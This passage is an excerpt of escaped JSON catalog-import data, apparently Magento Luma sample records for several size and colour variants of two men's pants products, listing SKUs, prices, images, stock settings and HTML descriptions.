green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"712\":{\"sku\":\"MP03-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-34-Red\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"713\":{\"sku\":\"MP03-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-36-Blue\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"714\":{\"sku\":\"MP03-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-36-Green\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"715\":{\"sku\":\"MP03-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-36-Red\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"716\":{\"sku\":\"MP03\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Sweatpants|Track Pants,material=CoolTech&trade;|Polyester|Rayon|Spandex|Wool,pattern=Solid,climate=All-weather|Cool|Indoor|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP03-32-Blue,size=32,color=Blue|sku=MP03-32-Green,size=32,color=Green|sku=MP03-32-Red,size=32,color=Red|sku=MP03-33-Blue,size=33,color=Blue|sku=MP03-33-Green,size=33,color=Green|sku=MP03-33-Red,size=33,color=Red|sku=MP03-34-Blue,size=34,color=Blue|sku=MP03-34-Green,size=34,color=Green|sku=MP03-34-Red,size=34,color=Red|sku=MP03-36-Blue,size=36,color=Blue|sku=MP03-36-Green,size=36,color=Green|sku=MP03-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp03-black_alt1.jpg,\\/m\\/p\\/mp03-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp03-black_alt1.jpg,\\/m\\/p\\/mp03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Sweatpants|Track Pants\",\"material\":\"CoolTech&trade;|Polyester|Rayon|Spandex|Wool\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"717\":{\"sku\":\"MP04-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-32-Black\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"718\":{\"sku\":\"MP04-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-32-Gray\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"719\":{\"sku\":\"MP04-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-32-Green\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"720\":{\"sku\":\"MP04-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-33-Black\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; 